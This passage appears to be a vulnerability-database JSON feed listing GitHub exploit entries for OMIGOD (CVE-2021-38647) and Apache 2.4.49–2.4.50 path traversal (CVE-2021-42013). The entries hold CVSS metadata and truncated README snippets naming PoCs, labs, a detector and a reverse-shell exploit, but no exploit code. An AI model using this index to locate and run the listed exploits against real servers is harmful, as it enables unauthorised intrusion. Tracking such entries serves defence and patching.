"2021-09-15T21:44:30", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-19T05:39:40", "id": "1EC6324C-A18E-517A-9A55-F1C2D1BCA358", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:36:40", "description": "# OMIGOD_cve-2021-38647\nCVE-2021-38647 is an unauthentica...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T10:53:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-10-10T08:48:26", "id": "54D698B4-9CF0-5D7F-88D2-1053A11EA7C3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:36:55", "description": "# Readme\n\nAn educational lab VM to learn about the 9.6 CVSS unau...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-18T15:25:18", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-27T11:34:25", "id": "09412330-832C-538A-A226-61474048E41B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:11:02", "description": "# CVE-2021-38647: Omigod\nAnother exploit for Omigod written quic...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-26T18:06:00", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-10-29T10:57:34", "id": "A99AB73C-8E46-5B9C-A402-F78F96EE2327", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-09T23:40:22", "description": "# CVE-2021-38647\n\nCVE-2021-38647 - POC to exploit unauthenticate...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-20T16:29:48", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-08-09T18:59:00", "id": "FA1DEEA0-A8AF-5C21-98E6-9D3379266529", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:11:26", "description": "# OMIGOD PoC\n\n## Usage\n\n```\n$ go run CVE-2021-38647.go -h\n\nUSAGE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-22T01:05:22", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-22T22:40:10", "id": "CE2FB7D7-ABCF-58F8-AACC-D0E6FEE8865A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:12:30", "description": "# CVE-2021-38647 AKA \"OMIGOD\"\nA Zeek package which detects CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T04:51:02", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-02-11T01:13:18", "id": "8217668C-9748-5511-8C01-7E933D69F872", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-42013 - Apache HTTP Server 2.4.50\n\n# Cara Menjalankan...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-20T15:32:39", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-23T13:16:56", "id": "5312D04F-9490-5472-84FA-86B3BBDC8928", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-02-08T18:31:10", "description": "# CVE-2021-42013\n## Poc CVE-2021-42013 - Apache 2.4.50 w...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-23T21:58:44", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-08-29T22:56:33", "id": "22DCCD26-B68C-5905-BAC2-71D10DE3F123", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-21T12:49:33", "description": "# cve-2021-42013\nApache 2.4.50 Path traversal vulnerab...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T05:44:54", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-07-04T15:27:56", "id": "6BCBA83C-4A4C-58D7-92E4-DF092DFEF267", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-02-08T17:20:13", "description": "# Apache 2.4.50 - Path Traversal or Remote Code Execution\ncve-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-15T12:15:00", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-09-15T12:15:18", "id": "9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-15T15:23:57", "description": "# cve-2021-42013\nApache 2.4.50 Path traversal vulnerabi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-15T11:35:00", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-09-15T11:35:00", "id": "E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-02-08T17:20:24", "description": "# Apache 2.4.50 - Path Traversal or Remote Code Execution\ncve-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-15T11:28:39", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-09-15T11:28:51", "id": "CC15AE65-B697-525A-AF4B-38B1501CAB49", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T12:39:42", "description": "# CVE-2021-42013-LAB\nApache HTTP Server 2.4.50 - RCE Lab\n\n\n**exp...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T13:26:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-02-20T23:15:08", "id": "6A0A657E-8300-5312-99CE-E11F460B1DBF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-01T23:13:35", "description": "# CVE-2021-42013\nApache 2.4.49-50 Remote Code Ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-28T09:21:50", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-07-28T09:24:11", "id": "4051D2EF-1C43-576D-ADB2-B519B31F93A0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-31T04:56:17", "description": "# CVE-2021-42013\nC implementation of the infamous [Apache 2.4.50...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-31T03:28:20", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-05-31T03:29:22", "id": "61075B23-F713-537A-9B84-7EB9B96CF228", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T22:19:41", "description": "# apache-exploit-CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T18:31:29", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-04-09T05:38:40", "id": "2A177215-CE4A-5FA7-B016-EEAF332D165C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-02-08T18:31:09", "description": "# CVE-2021-42013_Reverse-Shell\nPoC CVE-2021-42013 reverse shell ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-24T12:57:55", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-03-27T07:43:58", "id": "8713FD59-264B-5FD7-8429-3251AB5AB3B8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-28T15:50:38", "description": "# CVE-2021-42013\nApache 2.4.49-50 Remote Code Ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-28T09:21:50", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-07-28T09:24:11", "id": "E81474F6-6DDC-5FC2-828A-812A8815E3B4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-03-22T21:18:00", "description": "# Apache 2.4.50 - Path Traversal or Remote Code Execution\nCVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-27T14:29:10", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2023-02-10T09:20:38", "id": "52E13088-9643-5E81-B0A0-B7478BCF1F2C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-02T03:24:34", "description": "# CVE-2021-41773_Ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 